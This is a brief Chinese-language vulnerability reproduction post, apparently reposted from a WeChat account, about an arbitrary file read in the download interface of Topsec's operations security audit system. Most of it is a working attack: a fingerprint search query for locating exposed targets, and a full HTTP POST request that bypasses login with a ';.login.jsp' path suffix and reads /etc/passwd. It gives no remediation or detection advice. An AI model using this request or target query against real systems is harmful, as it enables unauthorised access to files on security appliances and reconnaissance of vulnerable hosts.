天融信运维安全审计系统在download接口处存在任意文件读取漏洞。
header="iam" && server="Apache-Coyote/"
POST /iam/download;.login.jsp HTTP/1.1
Host: IP
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0
Accept: application/json, text/plain, */*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Content-Type: application/x-www-form-urlencoded
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-site
Content-Length: 67
filename=1.txt&filepath=/etc/passwd
原文始发于微信公众号(白帽攻防):【漏洞复现】天融信运维安全审计系统download接口处存在任意文件读取漏洞
- 左青龙
- 微信扫一扫
- 右白虎
- 微信扫一扫
评论